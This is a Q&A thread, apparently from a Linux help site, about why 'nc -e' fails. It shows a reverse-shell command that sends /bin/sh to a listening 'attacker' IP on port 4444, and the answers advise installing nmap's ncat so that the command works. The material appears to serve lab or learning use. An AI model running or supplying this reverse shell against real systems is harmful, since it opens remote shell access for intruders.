# invalid option -e in netcat

Tags: linux-mint, netcat

I am trying to get a shell on host machine from another (attacker) machine.
Attacker machine is listening.
I am running below command on my host machine

```
nc 123.123.123.12 4444 -e /bin/sh
```

Output I get:

```
nc: invalid option -- 'e'

usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
      [-m minttl] [-O length] [-P proxy_username] [-p source_port]
      [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
      [-X proxy_protocol] [-x proxy_address[:port]]       [destination] [port]
```

Comment: Welcome to the site. It would seem that you are running a version of `netcat` that simply doesn't support this option; the "usage" message displayed doesn't include one, if you look carefully. `netcat` is not as standardized as other tools in the Linux/Unix world, and supported options may differ across variants, see e.g. [this question and answer](https://superuser.com/questions/691008/why-is-the-e-option-missing-from-netcat-openbsd) on superuser.com.

Answer (score 25, accepted):

There are multiple variants of netcat. Install the version of netcat developed by nmap.org

On my Ubuntu system, there are 2 packages `netcat` and `ncat`. The one from nmap is `ncat` and supports the `-e` option. The other one does not.

You need to find the right package for your distribution.

EDIT:
On **Kali Linux** (2022.3), the packages `netcat-openbsd` and `netcat-traditional` will install the netcat version without the `-e` option. If you want the one with the `-e` option, install the package `ncat`. After installing `ncat`, the binary to launch will be `/usr/bin/ncat`

Comment: i was able to install ncat in kali linux but in mint it says unable to locate package ncat

Comment: @Tarandeepsingh I am 3 years late but make sure you do a `sudo apt update` before trying to install `ncat`

Answer (score 3):

As **@GMaster** suggested, you need to get the nmap variant of `ncat` using the following command:

```
$ apt install ncat
```

After that, use `ncat` command instead of `nc`.

Answer (score 1):

Happened to me when I wanted to make reverse shell, but failed because of this message:

```
nc: invalid option -- 'e'
```

Here I used `ncat` instead of `nc` and all has same functionalities.